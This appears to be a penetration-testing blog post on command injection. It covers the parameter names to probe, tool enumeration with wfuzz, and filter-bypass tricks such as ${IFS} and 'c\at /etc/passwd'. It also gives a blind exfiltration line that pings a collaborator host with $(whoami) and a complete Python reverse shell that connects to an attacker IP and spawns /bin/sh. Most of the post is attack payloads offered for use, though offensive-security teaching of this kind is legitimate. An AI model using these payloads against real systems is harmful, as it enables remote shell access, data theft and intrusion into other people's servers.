Sign in Subscribe
Application Security

Mastering the Mechanics of Command Injection: Unraveling the Web’s Silent Threat

Command injection is like telling someone to play a specific song on a jukebox, but instead of just picking a song, you sneakily add…

fuffsec

3 min read

Command injection is like telling someone to play a specific song on a jukebox, but instead of just picking a song, you sneakily add instructions to also give you all the money inside the jukebox. In the digital world, instead of songs, we’re dealing with computer commands, and malicious users can exploit vulnerabilities to make the system do things it’s not supposed to.

Certainly, if we encounter a web application during our analysis that appears to be executing system-level commands, it’s essential to conduct command injection tests on any input fields that might directly interact with the backend system.

Identification

  • Identify based on the parameter name in the requests [1]
?cmd={payload} 
?exec={payload} 
?command={payload} 
?execute{payload} 
?ping={payload} 
?query={payload} 
?jump={payload} 
?code={payload} 
?reg={payload} 
?do={payload} 
?func={payload} 
?arg={payload} 
?option={payload} 
?load={payload} 
?process={payload} 
?step={payload} 
?read={payload} 
?function={payload} 
?req={payload} 
?feature={payload} 
?exe={payload} 
?module={payload} 
?payload={payload} 
?run={payload} 
?print={payload}
  • Identify by sending time-based or reflected output-based payload

payload to brute-force — <link>, <link>

Exploit (build payload)

  1. Check for existing tools using the payload below:
fuffsec #baseline 
wget 
curl 
fetch 
gcc 
cc 
nc 
socat 
ping 
netstat 
ss 
ifconfig 
ip 
hostname 
php 
python 
python3 
perl 
java 
awk 
sed 
grep 
cat 
more 
less 
tail 
head 
find 
ssh 
telnet 
bash 
sh 
zsh 
dig 
nslookup 
traceroute 
dd 
ncat 
nmap 
ftp 
tftp 
base64 
gzip 
gunzip 
tar 
zip 
unzip
wfuzz -c -z file,payload.txt --hc 404 "http:<end_point>?ip=127.0.0.1;which FUZZ"
  • Filter based on response size

2. Bypass restrictions

Types of restrictions:

Use encoding to bypass restrictions, if does not work then use the below
- base64
- hexadecimal
- octal
- Use double quotes and single quotes

2.1 blacklist bypass

2.1.1 Space bypass

<> 
< 
> 
$IFS\ 
${IFS}

2.1.2 keyword bypass

  • $* and $@

In the context of shell scripting, $* and $@ are used to refer to all the arguments passed to a script. If a script is mistakenly interpolating these within a command, an attacker can inject additional commands.

# A simplistic script 
echo "Printing argument: $@"
  • $x and ${x}

These are ways to reference positional parameters in a shell script. $x where x is a number between 1-9, referring to the respective argument passed to the script. ${x}, where x is 10 or greater, is another way to refer to positional parameters beyond single digits.

  • Use backslashes

Backslashes can be used to escape characters, making the subsequent character be interpreted literally. This can sometimes be used to bypass filters.

Example: If a filter is blocking the cat command, an attacker might try c\at /etc/passwd to potentially bypass the filter.

  • Using variables

Variables can sometimes be set to particular values and then referenced to execute commands.

2.2 Blind injection bypass

Here, we can it bypass cause we are unaware that something is happening. So, we need to use the ‘sleep’ or ‘ping’ command to find it.

ping $(whoami).collaborator_server_dot_com

blog: <link>, <link>

2.3 Misc

For more bypass techniques, follow this: <link>

3. Get a reverse shell

given below are the few payloads we could use (please encode it and bypass restrictions) :

Since we enumerated the existing tools in Step 1, we know what to do.

  • Python (example)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$IP",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Actual code:

import socket 
import subprocess 
import os 
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
s.connect(("IP",9090)) 
os.dup2(s.fileno(),0) 
os.dup2(s.fileno(),1) 
os.dup2(s.fileno(),2) 
p=subprocess.call(["/bin/sh","-i"]);'
I would suggest you use the website to generate an awesome payload. <link>

Exfiltrate

Source

you can use the resource to find some exciting payloads to use, make sure to encode it and bypass any restrictions. <link>

Tools:

  1. https://github.com/commixproject/commix

More Awesome Blogs

I am inspired by many bloggers and would like to list a few great people. Please give it a read if you can.

  1. https://medium.com/@Steiner254/os-command-injection-c4ee28fab521
  2. https://portswigger.net/web-security/os-command-injection
  3. https://www.cobalt.io/blog/introduction-to-command-injection-vulnerability
  4. https://www.cobalt.io/blog/a-pentesters-guide-to-command-injection
  5. https://infosecwriteups.com/breaking-down-command-injections-97d1029576

I have a small request to make. I often write articles on various security topics, so if you haven’t already, please follow me and give this article a clap. Your support motivates me to continue writing and sharing new insights with you all. Thank you!

If you do not follow me on here, here is my Twitter and LinkedIn.

☛ My-Twitter
My-Linkedin

References:

  1. https://twitter.com/trbughunters/status/1283133356922884096